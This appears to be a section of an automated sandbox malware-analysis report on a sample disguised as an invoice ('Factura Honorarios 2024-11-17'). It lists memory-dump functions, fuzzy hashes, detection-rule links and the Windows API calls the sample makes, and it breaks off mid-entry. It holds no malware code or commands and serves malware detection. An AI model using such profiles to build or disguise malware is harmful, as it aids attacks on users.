                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 4dd1927ba2ad2d5906cee853cc075b3a54f8b8b08a401cb33e7c3d6d4e6b1a1b
                                                                                                                                  • Instruction ID: a6ae5ca596d9023f245d49baf78afbec3428db822741416a12c306d71a5b463b
                                                                                                                                  • Opcode Fuzzy Hash: 4dd1927ba2ad2d5906cee853cc075b3a54f8b8b08a401cb33e7c3d6d4e6b1a1b
                                                                                                                                  • Instruction Fuzzy Hash: D181C774E00618CFEB14DFAAD884A9DBBF2BF89301F14C069E819AB365DB309945CF51
                                                                                                                                  Function 391E6568 Relevance: .2, Instructions: 168COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 312fdbc55a00279efc464f624b2f97f223f4a880122d1452a263db2d04402a18
                                                                                                                                  • Instruction ID: 89d58b01a037d23ec6b580838e8a6e6f983d9df47b4d6e7b1a793462b074c30c
                                                                                                                                  • Opcode Fuzzy Hash: 312fdbc55a00279efc464f624b2f97f223f4a880122d1452a263db2d04402a18
                                                                                                                                  • Instruction Fuzzy Hash: F5511270D01348DFEB15DFAAD894ADDBBB2FF8A344F11806AD018AB224DB325981CF50
                                                                                                                                  Function 38F8178F Relevance: .2, Instructions: 165COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ad2a997d8e86021afe1d28af3f8dec17f6018869fc5ee6a4a6791910d4aa83c8
                                                                                                                                  • Instruction ID: fe2c6c7b9bbc3f1f2ef7d1155b463f0ea1a8d72dced92d119b635f742070d92a
                                                                                                                                  • Opcode Fuzzy Hash: ad2a997d8e86021afe1d28af3f8dec17f6018869fc5ee6a4a6791910d4aa83c8
                                                                                                                                  • Instruction Fuzzy Hash: EC8195B5D016188FEB68DF6AC954B9EBBF2BF88300F14C1EAD408A7254DB744A85CF11
                                                                                                                                  Function 0015E97C Relevance: .1, Instructions: 149COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ef410885159374232c4d5de52cb600d5a5ac48db056fc1c4d08f878a22b01c36
                                                                                                                                  • Instruction ID: 1ab0fb435c67aaa1db1288a454d44a664a5b3649e0ea3b33d380a57240256279
                                                                                                                                  • Opcode Fuzzy Hash: ef410885159374232c4d5de52cb600d5a5ac48db056fc1c4d08f878a22b01c36
                                                                                                                                  • Instruction Fuzzy Hash: E151A674E00208DFEB18DFAAD884A9DBBF2FF89301F249029E815AB364DB305945CF55
                                                                                                                                  Function 0015E988 Relevance: .1, Instructions: 147COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c9b92cb7385182b899fe8f5e08d26992f280ee7e437eb34e4d9c01a7c0e0d154
                                                                                                                                  • Instruction ID: 6c3618153d7cc6361d2fdcff9c34ea8bb0df3bd7667ed3cb6337b70c42bd924f
                                                                                                                                  • Opcode Fuzzy Hash: c9b92cb7385182b899fe8f5e08d26992f280ee7e437eb34e4d9c01a7c0e0d154
                                                                                                                                  • Instruction Fuzzy Hash: 6E519574E00208DFEB18DFAAD894A9DFBF2BF89301F248129E815AB364DB305945CF55
                                                                                                                                  Function 391E5FC7 Relevance: .1, Instructions: 123COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c34da2e5e39b64979aa5ed8f6412a893ada2b56d4ad8d9963387c3371e6a1c25
                                                                                                                                  • Instruction ID: f5099232b143ad4db3a89a7d72a8f3015d9edff8ad841c7c20330441a6ccd564
                                                                                                                                  • Opcode Fuzzy Hash: c34da2e5e39b64979aa5ed8f6412a893ada2b56d4ad8d9963387c3371e6a1c25
                                                                                                                                  • Instruction Fuzzy Hash: 4E41F3B4E006088BEB18DFAAC8547DEFBF2AF89304F54C16AD418BB254DB355986CF54
                                                                                                                                  Function 38F81E70 Relevance: .1, Instructions: 111COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1b742549914ebd0fa6e346d3ffb5382c5d8fa90d4fbb46c52b8e2c6b6b36bd12
                                                                                                                                  • Instruction ID: 39c4ab5dcb2dc24ad14abed4f1e454c4c6b3c7ac98b8efaf6f49105944904a92
                                                                                                                                  • Opcode Fuzzy Hash: 1b742549914ebd0fa6e346d3ffb5382c5d8fa90d4fbb46c52b8e2c6b6b36bd12
                                                                                                                                  • Instruction Fuzzy Hash: 104148B1E016188BEB58CF6BC9547DAFAF3AFC9300F14C5AAC50CA6264DB750A858F51
                                                                                                                                  Function 391ECAD1 Relevance: .1, Instructions: 102COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: def7aea0ca7d0b907e34c7ae4489208b7c9b992e8b5912f8918d726c59f35c0b
                                                                                                                                  • Instruction ID: 56aa5aa161977a8493aa48b5d2839760de5827431fb54ff8c9aec7ffd1b1a65a
                                                                                                                                  • Opcode Fuzzy Hash: def7aea0ca7d0b907e34c7ae4489208b7c9b992e8b5912f8918d726c59f35c0b
                                                                                                                                  • Instruction Fuzzy Hash: BD41D2B4E00618CBEB18CFAAD8546DEBBF2BF89304F10C16AD418BB254EB345946CF54
                                                                                                                                  Function 39211CE0 Relevance: .1, Instructions: 99COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0c2677aa4a67e98c573e736cefe31a0760183bfaa2860654d294bb1147e4f3a6
                                                                                                                                  • Instruction ID: 2cb7aa2fca517e6d9761bab830c8b103a438e47e9cb5a312b15a62ce7319d69c
                                                                                                                                  • Opcode Fuzzy Hash: 0c2677aa4a67e98c573e736cefe31a0760183bfaa2860654d294bb1147e4f3a6
                                                                                                                                  • Instruction Fuzzy Hash: 0E41F4B4E006188BEB18CFAAD8547DEBBF2BF89300F14C06AD418BB255EB345946CF50
                                                                                                                                  Function 391E1B91 Relevance: .1, Instructions: 98COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 348ace8fae9fb73e799b1d92020f9f4dca962c1e0dd797b689b961fd46b99aa3
                                                                                                                                  • Instruction ID: f8bfa12dbacea0e02eb712eece9f107a17a5a3b51dcf0eeb30af34b596ba24a1
                                                                                                                                  • Opcode Fuzzy Hash: 348ace8fae9fb73e799b1d92020f9f4dca962c1e0dd797b689b961fd46b99aa3
                                                                                                                                  • Instruction Fuzzy Hash: 8941B474E00608CBEB58CFAAD9506DEFBF2AF89304F20C12AD418BB254DB355946CF54
                                                                                                                                  Function 38F8E257 Relevance: .1, Instructions: 95COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5e9da2fb6aaf1c1270dc6b8e920616e5872f0ad8025585419e613bba355ffa56
                                                                                                                                  • Instruction ID: 93cff9d99068ec6629bf4503a6899063465b3be581aa649a40bdc64040853905
                                                                                                                                  • Opcode Fuzzy Hash: 5e9da2fb6aaf1c1270dc6b8e920616e5872f0ad8025585419e613bba355ffa56
                                                                                                                                  • Instruction Fuzzy Hash: B941C574E01248CBEB14CFAAC9506DDBBF2AF89304F20D129C418BB254DB345946CF51
                                                                                                                                  Function 38F8E24D Relevance: .1, Instructions: 93COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 638428b773dcab768c1cc437a67de1a346e307561aa012283fdaa5b64895204b
                                                                                                                                  • Instruction ID: 4913d16e3e0d4fcf02ad37d3b36052f223e1500d2e6419c2a300bd6b143709bf
                                                                                                                                  • Opcode Fuzzy Hash: 638428b773dcab768c1cc437a67de1a346e307561aa012283fdaa5b64895204b
                                                                                                                                  • Instruction Fuzzy Hash: 8731D3B5E04648CBEB18CFAAC94069DBBF2AF89304F24C52AC418BB264DB345946CF55
                                                                                                                                  Function 393996F0 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 39399776
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 393997B3
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 393997F0
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 39399849
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: e56ee6fa7379ed6405f8941a01f2ca1c3e1c86a066781c8c3d971a605ec461e8
                                                                                                                                  • Instruction ID: 6fe97238720dff5ec2416f7db0e339843d84dc4faa04d3442efc82be52eabd31
                                                                                                                                  • Opcode Fuzzy Hash: e56ee6fa7379ed6405f8941a01f2ca1c3e1c86a066781c8c3d971a605ec461e8
                                                                                                                                  • Instruction Fuzzy Hash: 175134B49103499FEB04DFAAC584BDEBBF1AF88310F208459E419B7290DB746944CF65
                                                                                                                                  Function 393996F8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 39399776
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 393997B3
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 393997F0
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 39399849
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                  • Opcode ID: c7372072b8a998d000d6f5c9672c385bf669c8d2b4eb75385c5ee4b9628c09b8
                                                                                                                                  • Instruction ID: a08a029c1572b00511e40621cd5ce5334e6b877a3f635cf03b4541ed6ee0e8fa
                                                                                                                                  • Opcode Fuzzy Hash: c7372072b8a998d000d6f5c9672c385bf669c8d2b4eb75385c5ee4b9628c09b8
                                                                                                                                  • Instruction Fuzzy Hash: 155123B49103498FDB04DFAAC584BDEBBF5AF88310F208419E419B7390DB756940CF65
                                                                                                                                  Function 39484284 Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 975 39484284-394842f6 976 394842f8-394842fe 975->976 977 39484301-39484308 975->977 976->977 978 3948430a-39484310 977->978 979 39484313-3948434b 977->979 978->979 980 39484353-394843b2 CreateWindowExW 979->980 981 394843bb-394843f3 980->981 982 394843b4-394843ba 980->982 986 39484400 981->986 987 394843f5-394843f8 981->987 982->981 988 39484401 986->988 987->986 988->988
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 394843A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 620bbac035638670495d261a4e2fc1ade917943f11545daf74c6592c70c5c3a8
                                                                                                                                  • Instruction ID: 9335f1cedf3c4754204f2b1846c594c49af0451cb931fa2ab422c6b6ee0861e5
                                                                                                                                  • Opcode Fuzzy Hash: 620bbac035638670495d261a4e2fc1ade917943f11545daf74c6592c70c5c3a8
                                                                                                                                  • Instruction Fuzzy Hash: CF51B2B5D10349DFDB14CFA9D980ADDBBB5FF88310F60812AE819AB210D775A945CF90
                                                                                                                                  Function 39484290 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 989 39484290-394842f6 990 394842f8-394842fe 989->990 991 39484301-39484308 989->991 990->991 992 3948430a-39484310 991->992 993 39484313-394843b2 CreateWindowExW 991->993 992->993 995 394843bb-394843f3 993->995 996 394843b4-394843ba 993->996 1000 39484400 995->1000 1001 394843f5-394843f8 995->1001 996->995 1002 39484401 1000->1002 1001->1000 1002->1002
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 394843A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: dfdae0f3d73cdaa4d72e72df35e768de0a39cad72900436aece33fe4be5765d5
                                                                                                                                  • Instruction ID: fc42594126fcc73ae965b722a37f6d6f660b1fde5e08d60d75a08924792dba72
                                                                                                                                  • Opcode Fuzzy Hash: dfdae0f3d73cdaa4d72e72df35e768de0a39cad72900436aece33fe4be5765d5
                                                                                                                                  • Instruction Fuzzy Hash: 0141B3B5D04349DFDF14CF9AD884ADEBBB5BF48310F64812AE818AB210D775A945CF90
                                                                                                                                  Function 39481994 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1003 39481994-39486a0c 1006 39486abc-39486adc call 3948186c 1003->1006 1007 39486a12-39486a17 1003->1007 1015 39486adf-39486aec 1006->1015 1008 39486a19-39486a50 1007->1008 1009 39486a6a-39486aa2 CallWindowProcW 1007->1009 1017 39486a59-39486a68 1008->1017 1018 39486a52-39486a58 1008->1018 1011 39486aab-39486aba 1009->1011 1012 39486aa4-39486aaa 1009->1012 1011->1015 1012->1011 1017->1015 1018->1017
                                                                                                                                  APIs
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 39486A91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                  • Opcode ID: 46a042baaacb16134d2d23a0a3bed606b00c165e325b587346561d9a1b095ff3
                                                                                                                                  • Instruction ID: 21014603886d85f748273c17548e7cd496a9f660888a6c948b049c1e13355153
                                                                                                                                  • Opcode Fuzzy Hash: 46a042baaacb16134d2d23a0a3bed606b00c165e325b587346561d9a1b095ff3
                                                                                                                                  • Instruction Fuzzy Hash: 51413AB9A003099FDB44DF99C884B9ABBF5FF89310F24C559D518A7321D775A841CFA0
                                                                                                                                  Function 39399938 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1117 39399938-393999d4 DuplicateHandle 1118 393999dd-393999fa 1117->1118 1119 393999d6-393999dc 1117->1119 1119->1118
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 393999C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: ef6ace7eb2a8d69349da4888c7334353eec6b0cf87fb698387f848f01dcf2443
                                                                                                                                  • Instruction ID: ebdb0469edbd901a227e8df9844cb8084d279444ef0623fd5be9e7805186a187
                                                                                                                                  • Opcode Fuzzy Hash: ef6ace7eb2a8d69349da4888c7334353eec6b0cf87fb698387f848f01dcf2443
                                                                                                                                  • Instruction Fuzzy Hash: 1521E5B59002499FDB10CFAAD584BDEBFF5EB48310F14841AE958A3310D375A950CFA1
                                                                                                                                  Function 39399940 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1122 39399940-393999d4 DuplicateHandle 1123 393999dd-393999fa 1122->1123 1124 393999d6-393999dc 1122->1124 1124->1123
                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 393999C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  • Opcode ID: 6e5fca89ac30fc12b6111896c9cbcba69266553147b6065f7b6b2c75c9d86e73
                                                                                                                                  • Instruction ID: a7099c4552c84a37f0d5c08b74973d7a572adb9ad94f4731b465a31521207632
                                                                                                                                  • Opcode Fuzzy Hash: 6e5fca89ac30fc12b6111896c9cbcba69266553147b6065f7b6b2c75c9d86e73
                                                                                                                                  • Instruction Fuzzy Hash: DF21C4B59003499FDB10CFAAD984BDEBBF5EB48320F14841AE958A3350D374A950CFA5
                                                                                                                                  Function 39488080 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 39488F6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: 80d005ad050fbaf1e0ac7fa5057d86a494871070a9ba89c7477ef0ecd2ff247e
                                                                                                                                  • Instruction ID: cfbf544abda659fb0a3beaaa5a61fe07f6189dbe7c8d739f9c1ec57dc2325245
                                                                                                                                  • Opcode Fuzzy Hash: 80d005ad050fbaf1e0ac7fa5057d86a494871070a9ba89c7477ef0ecd2ff247e
                                                                                                                                  • Instruction Fuzzy Hash: 141115B59043498FDB20DFAAD884BDEBBF4EF48320F208419E518A7350D779A940CFA5
                                                                                                                                  Function 39488F10 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 39488F6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: ff1dff3a26ad120841d196ae52e2a580a1d28d4587e61a62f50f754090ebe295
                                                                                                                                  • Instruction ID: 24a0f1b3010264c6f0b718eb0c70621fc38a97178593babfdc97b06d713fcf3c
                                                                                                                                  • Opcode Fuzzy Hash: ff1dff3a26ad120841d196ae52e2a580a1d28d4587e61a62f50f754090ebe295
                                                                                                                                  • Instruction Fuzzy Hash: 251112B59007498FCB10DFAAD584BDEBBF4EF48320F24841AE558A7310C379A944CFA1
                                                                                                                                  Function 38F83A50 Relevance: 1.5, Strings: 1, Instructions: 286COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                  • Opcode ID: c3d15920a2d1aac58eccfb5083f6c91a99b71ddc7d3cd4de6dc96f74f7dfc591
                                                                                                                                  • Instruction ID: b0122ec244574e3427abac40b5195ebcd730e35f671896e1e5cdee4185069a4d
                                                                                                                                  • Opcode Fuzzy Hash: c3d15920a2d1aac58eccfb5083f6c91a99b71ddc7d3cd4de6dc96f74f7dfc591
                                                                                                                                  • Instruction Fuzzy Hash: C4A1E4B47043049FEB155F78985866E7BA2BFC6360F204A29E45ADB3E1CF348D41CB92
                                                                                                                                  Function 00152790 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 0-2730988801
                                                                                                                                  • Opcode ID: 501c5a09b799ba020af370669d81d818077e456ff6c52b4edc699ec668aaef2d
                                                                                                                                  • Instruction ID: 224855d36ef375b17eb13f4cfd3a455cf8537ad5ae4aff456e09df0837863082
                                                                                                                                  • Opcode Fuzzy Hash: 501c5a09b799ba020af370669d81d818077e456ff6c52b4edc699ec668aaef2d
                                                                                                                                  • Instruction Fuzzy Hash: F7315A75D093498FCB01DFB9D8546EDBFB4EF4A301F0011AAD944AB261EB301989CBA2
                                                                                                                                  Function 00158490 Relevance: .7, Instructions: 703COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0b076ab19a965c144210f768512b02e55bb198e3ddef30c956798078d8d9bb89
                                                                                                                                  • Instruction ID: 39fec0b6a5140aa1661861b30f875a05e2d36dac752281074aa51a544148aaaa
